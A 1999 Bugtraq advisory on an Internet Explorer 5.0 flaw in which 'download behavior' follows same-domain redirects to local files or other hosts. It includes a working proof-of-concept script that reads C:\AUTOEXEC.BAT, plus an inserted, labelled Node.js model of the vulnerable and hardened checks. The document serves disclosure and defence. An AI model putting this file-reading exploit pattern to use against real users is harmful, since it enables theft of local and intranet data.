From: Georgi Guninski <joro@NAT.BG>
Reply-To: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Mon, 27 Sep 1999 15:04:44 +0300
Message-Id: <37EF5D5C.41ABBF80@nat.bg>
Subject: IE 5.0 security vulnerability - reading local (and from any domain) text
files using "download behavior"
Disclaimer:
The opinions expressed in this advisory and program are my own and not
those of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use of
the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95 and Windows NT 4.0 (Windows 98 is
presumably vulnerable as well) allows reading local text files (the
extension does not matter) and parts of binary files.
It is also possible to read text files from any domain and, in some cases,
to read files from a web server behind a firewall.
Details:
The problem is the IE feature "download behavior".
An anchor element given this behavior exposes a "startDownload" method:
clicking the link fetches a URL and then executes a callback function.
When the callback function is executed by the "startDownload" method, the
contents of the downloaded file are passed to it as an argument.
Microsoft has implemented a security check which does not allow downloading
files in this way from a different domain.
But if the link points to a file in the same domain as the exploit page and
the server answers with an HTTP redirect (to a file:// URL, or to another
host), the redirect is followed and the exploit works.
It is not necessary for the user to click on the link; "startDownload" may
be called automatically from script.
This vulnerability may also be exploited using an HTML email message or a
newsgroup posting.
The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
// Callback invoked by startDownload; s holds the contents of the
// downloaded file (here, the redirect target C:\AUTOEXEC.BAT).
function doit(s)
{
alert ("Here is your file:\n"+s);
}
</SCRIPT>
<A ID="oD" STYLE="behavior:url(#default#download)"
HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec',
doit)">Click here to read C:\AUTOEXEC.BAT</A>.
----------------------------------------------------------------------------------------
("http://www.nat.bg/~joro/reject.cgi?autoexec" is a same-domain CGI script
that just does an HTTP redirect to file://c:/autoexec.bat)
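The following is an added illustration, not code from the advisory or from Internet Explorer: a small Node.js model of the download-behavior policy described above. `startDownloadVulnerable` applies the same-domain rule once, to the URL the page asked for, and then follows redirects blindly, which is the behaviour the advisory reports; `startDownloadHardened` re-applies the policy on every hop and refuses anything that is not http(s). The in-memory "web" (`FAKE_WEB`), `fakeFetch`, the page URL and the intranet host are constructed for the demo; only the reject.cgi URL and its file:// redirect target come from the advisory.

```javascript
// Constructed "web": each URL maps to either a redirect or a response body.
const FAKE_WEB = {
  "http://www.nat.bg/~joro/reject.cgi?autoexec": { redirect: "file://c:/autoexec.bat" },
  "http://www.nat.bg/~joro/reject.cgi?intranet": { redirect: "http://intranet.example/secret.txt" },
  "http://www.nat.bg/~joro/download2.html": { body: "<html>demo page</html>" },
  "http://intranet.example/secret.txt": { body: "internal notes" },
  "file://c:/autoexec.bat": { body: "@ECHO OFF\r\nSET PATH=C:\\WINDOWS\r\n" },
};

// Constructed fetch: a 302 with a Location for redirects, a 200 with a body otherwise.
function fakeFetch(url) {
  const entry = FAKE_WEB[url];
  if (!entry) return { status: 404, body: "" };
  if (entry.redirect) return { status: 302, location: entry.redirect };
  return { status: 200, body: entry.body };
}

// Origin = scheme + authority. Parsed with a regex rather than the URL class so
// that the odd "file://c:/..." form is handled the same way on every platform.
function originOf(url) {
  const m = /^([a-z][a-z0-9+.\-]*):\/\/([^\/?#]*)/i.exec(url);
  if (!m) return null;
  return { scheme: m[1].toLowerCase(), authority: m[2].toLowerCase() };
}

function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return !!x && !!y && x.scheme === y.scheme && x.authority === y.authority;
}

// Vulnerable model: the same-domain rule is checked once, against the requested
// URL, and redirects are then followed without re-checking. A same-domain URL
// that redirects to file:// (or to another host) therefore passes.
function startDownloadVulnerable(pageUrl, url, callback, fetch = fakeFetch) {
  if (!sameOrigin(pageUrl, url)) throw new Error("access denied: cross-domain " + url);
  for (let hops = 0; ; hops++) {
    const r = fetch(url);
    if (r.status === 302 && r.location && hops < 5) { url = r.location; continue; }
    return callback(r.body);
  }
}

// Hardened model: every hop, including the final one, must be http(s) and
// same-origin with the page. The callback still gets the body, but only of a
// resource the page was allowed to read directly.
function startDownloadHardened(pageUrl, url, callback, fetch = fakeFetch) {
  const MAX_HOPS = 5;
  for (let hops = 0; ; hops++) {
    const o = originOf(url);
    if (!o || (o.scheme !== "http" && o.scheme !== "https")) {
      throw new Error("access denied: scheme " + (o ? o.scheme : "?"));
    }
    if (!sameOrigin(pageUrl, url)) throw new Error("access denied: cross-domain " + url);
    const r = fetch(url);
    if (r.status === 302 && r.location) {
      if (hops >= MAX_HOPS) throw new Error("too many redirects");
      url = r.location;
      continue;
    }
    return callback(r.body);
  }
}

// Attack URL from the advisory: same domain as the page, but the server
// answers with a redirect to a local file.
const PAGE = "http://www.nat.bg/~joro/download2.html";
const ATTACK = "http://www.nat.bg/~joro/reject.cgi?autoexec";

function demo() {
  const leaked = startDownloadVulnerable(PAGE, ATTACK, (s) => s);
  let blocked = null;
  try { startDownloadHardened(PAGE, ATTACK, (s) => s); } catch (e) { blocked = e.message; }
  return { leaked, blocked };
}

console.log(demo());
```

The same redirect trick covers the "web server behind a firewall" case: a same-domain URL that redirects to an internal host passes the vulnerable check, while the hardened version rejects it at the second hop.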
Workaround:
Disable Active Scripting
Demonstration is available at http://www.nat.bg/~joro/download2.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro